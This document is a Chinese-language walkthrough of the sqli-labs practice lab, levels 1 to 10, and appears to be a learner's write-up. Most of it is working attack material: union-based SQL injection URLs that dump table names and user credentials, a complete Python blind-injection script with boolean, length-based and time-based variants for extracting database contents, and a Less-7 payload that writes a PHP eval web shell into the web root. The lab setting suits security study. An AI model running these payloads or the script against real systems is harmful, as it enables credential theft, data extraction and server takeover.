Less-1 字符报错注入
简单的报错注入,先用引号检测注入点
payload:
http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+
用 union select 检测字段数,字段数为 3
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+
查看用户:sqli@localhost
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+
查看数据库:security
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查看表名:users,emails,uagents,referers
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(column_name),3 from information_schema.columns where table_name='users' --+
查看列名:id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS(后三列疑似来自其它库中同名的 users 表,因为这条语句没有限定 table_schema;后面的脚本里加上了该条件)
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(id),group_concat(username) from users--+
查看表信息
Less-2 数字报错注入
测试注入:
http://192.168.44.139/sqli-labs/Less-2/?id=1 and 1=2
剩下的语句和 Less-1 一样,去掉数字后面的引号即可
Less-3
根据报错信息,引号后面还有一个括号,注入时改成 2') 即可,其余一样。
Less-4
双引号加括号,注入时改成 2") 即可。
Less-5 字符盲注
判断数据库长度:
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or (length(database()))>3 --+
判断数据库名:(字母逐个判断)
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or ascii(substr(database(),1,1))>1 --+
................................
自动化注入,贴一个小脚本:
import requests
# Base request for the Less-5 target; every probe below appends a SQL fragment to this string.
url = "http://192.168.44.139/sqli-labs/Less-5/?id=-1"
# Module-level results, filled in by getColumns / getTales / getDatabase via `global`.
_columns = []
_tables = []
_database = ""
def binarySearch(payload):
    """Resolve the integer value behind *payload* by bisection over 1..144.

    *payload* is a request URL whose SQL fragment ends in a comparable
    expression.  Each probe appends ``>`` + candidate + ``--+`` and sends it
    with ``requests.get``.  A response body containing the marker text
    ``"You are in"`` is read as "expression > candidate" and raises the lower
    bound; any other body lowers the upper bound.

    Returns the final lower bound, i.e. the first candidate the page did not
    answer "greater than".
    """
    lo, hi = 1, 144
    while lo <= hi:
        mid = (lo + hi) // 2
        probe = "{}>{}--+".format(payload, mid)
        body = requests.get(probe).text
        # marker present -> value is above mid -> discard the lower half
        if "You are in" in body:
            lo = mid + 1
        else:
            hi = mid - 1
    return lo
def getLength(func):
    """Return the character length of SQL expression *func* as the page reports it.

    Builds ``url + "' or length(<func>)"`` and hands it to binarySearch, which
    appends the comparison and runs the probes.  Reads the module-level ``url``.
    """
    probe = "{}' or length({})".format(url, func)
    return binarySearch(probe)
def getStr(func, length):
    """Recover *length* characters of SQL expression *func*, one position at a time.

    For position ``pos`` (1-based) the probe is
    ``url + "' or ascii(substr(<func>,pos,1))"``; binarySearch resolves the
    ASCII code, which ``chr`` turns into the character.  Returns the
    characters joined in order.
    """
    template = "{}' or ascii(substr({},{},1))"
    chars = []
    for pos in range(1, length + 1):
        code = binarySearch(template.format(url, func, pos))
        chars.append(chr(code))
    return "".join(chars)
def getDatabase():
    """Recover the current database name and store it in module-level ``_database``.

    The name length is resolved first (getLength), then each character
    (getStr).  The result is printed as ``[*] database: <name>`` before the
    global is updated.
    """
    global _database
    expr = "database()"
    name = getStr(expr, getLength(expr))
    print("[*] database: {}".format(name))
    _database = name
def getTaleNUM(database):
    """Print how many tables *database* holds (name kept as-is for callers).

    Resolves the length of the COUNT(...) text first and echoes that number,
    then recovers the digits with getStr and prints ``[*] table num =<count>``.
    Nothing is stored or returned.
    """
    count_expr = (
        "(select count(table_name) from information_schema.tables "
        "where table_schema='{}')"
    ).format(database)
    digits = getLength(count_expr)
    print(digits)
    count_text = getStr(count_expr, digits)
    print("[*] table num =" + count_text)
def getTales(database):
    """Recover the table names of *database* into module-level ``_tables``.

    The names arrive as one ``group_concat`` string, which is split on ``,``;
    the raw string is printed as ``[*] tables: <names>``.
    """
    global _tables
    names_expr = (
        "(select group_concat(table_name) from information_schema.tables "
        "where table_schema='{}')"
    ).format(database)
    joined = getStr(names_expr, getLength(names_expr))
    _tables = joined.split(',')
    print("[*] tables: {}".format(joined))
def getColumns(table, database):
    """Recover the column names of *table* in *database* into module-level ``_columns``.

    Unlike the manual Less-1 query, this one restricts ``table_schema`` so
    same-named tables in other schemas are not mixed in.  The raw
    ``group_concat`` string is split on ``,`` and printed as
    ``[*] columns from <table>:<names>``.
    """
    global _columns
    cols_expr = (
        "(select group_concat(column_name) from information_schema.columns "
        "where table_name='{}' and table_schema='{}')"
    ).format(table, database)
    joined = getStr(cols_expr, getLength(cols_expr))
    _columns = joined.split(",")
    print("[*] columns from {}:{}".format(table, joined))
def getInformation(table, column):
    """Print the rows of *table* for the column names listed in *column*.

    Each column is fetched as one ``group_concat(<col>)`` string through
    getLength/getStr and split on ``,``.  Rows are then printed one per line,
    values separated by single spaces (a trailing space is kept, as in the
    original).  The row count is taken from the first column, so an
    IndexError follows if another column yields fewer values, and an empty
    *column* list also raises IndexError.
    """
    values = {}
    for name in column:
        expr = "(select group_concat({}) from {})".format(name, table)
        values[name] = getStr(expr, getLength(expr)).split(',')
    row_count = len(values[column[0]])
    for row in range(row_count):
        line = "".join(values[name][row] + " " for name in column)
        print(line)
if __name__ == "__main__":
    # Walk the chain once: database name -> its tables -> columns of the
    # first table -> that table's rows.  Each step reads the global the
    # previous one filled in.
    getDatabase()
    getTales(_database)
    getColumns(_tables[0],_database)
    getInformation(_tables[0], _columns)
Less-6
将第五关的单引号改为双引号
Less-7 文件写入注入
写入shell,注意权限
http://192.168.44.139/sqli-labs/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile '/var/www/html/a.txt' --+
写入之前可以先用 @@datadir 查看服务器系统类型,尝试猜 web 的绝对路径
Less-8
盲注。可用第五关脚本
Less-9 时间盲注
盲注。虽然题目名为时间盲注,但也可以根据返回数据的长度做布尔盲注,只需更改第五关脚本的 binarySearch 函数即可
# LEN is the page length for a valid id; on Less-9 the length changes when the id
# does not exist, and that difference is the only signal the probes below read
# (a page that looks identical in both cases would remove it).
LEN = len(requests.get("http://192.168.44.214/sqli-labs/Less-9/?id=1").text)
def binarySearch(payload):
    """Length-based variant of the bisection for Less-9.

    Same search as the Less-5 version (``payload>mid--+`` over 1..144), but
    the page text is not inspected: a response whose length equals the
    module-level ``LEN`` is read as "expression > mid"; any other length
    lowers the upper bound.  Returns the final lower bound.
    """
    lo, hi = 1, 144
    while lo <= hi:
        mid = (lo + hi) // 2
        probe = "{}>{}--+".format(payload, mid)
        body = requests.get(probe).text
        # unchanged length -> the condition held -> value is above mid
        if len(body) == LEN:
            lo = mid + 1
        else:
            hi = mid - 1
    return lo
如果要做真正的时间盲注,则把函数改成下面这样(脚本里需要加上 import re):
def timeout(url):
    """Return 1 if a GET to *url* does not complete within 2 seconds, else 0.

    The bare ``except`` is kept from the original: it also catches connection
    errors, SystemExit and KeyboardInterrupt, so a network failure is
    reported exactly like a slow response.
    """
    try:
        requests.get(url, timeout=2)
    except:  # noqa: E722 - preserved on purpose, see docstring
        return 1
    return 0
def binarySearch(payload):
    """Time-based variant of the bisection: the oracle is whether the request times out.

    The probe ``payload>mid--+`` is split with ``re.split(" or |--", ...)``
    into the URL prefix (element 0) and the comparison (element 1); the
    comparison is rewrapped as ``if(<cmp>,sleep(0.5),1)`` and sent through
    timeout().  A timeout (return 1) is read as "expression > mid".
    Needs ``import re`` at module level; the snippet on this page shows only
    ``import requests``.  Returns the final lower bound within 1..144.
    """
    lo, hi = 1, 144
    while lo <= hi:
        mid = (lo + hi) // 2
        parts = re.split(" or |--", "{}>{}--+".format(payload, mid))
        # the sleep duration can be adjusted as needed (note carried over from the original)
        delayed = "{}or if({},sleep(0.5),1) --+".format(parts[0], parts[1])
        if timeout(delayed):
            lo = mid + 1
        else:
            hi = mid - 1
    return lo
Less-10
和 Less-9 注入方式一样,将分界符 ' 更改为 " 即可。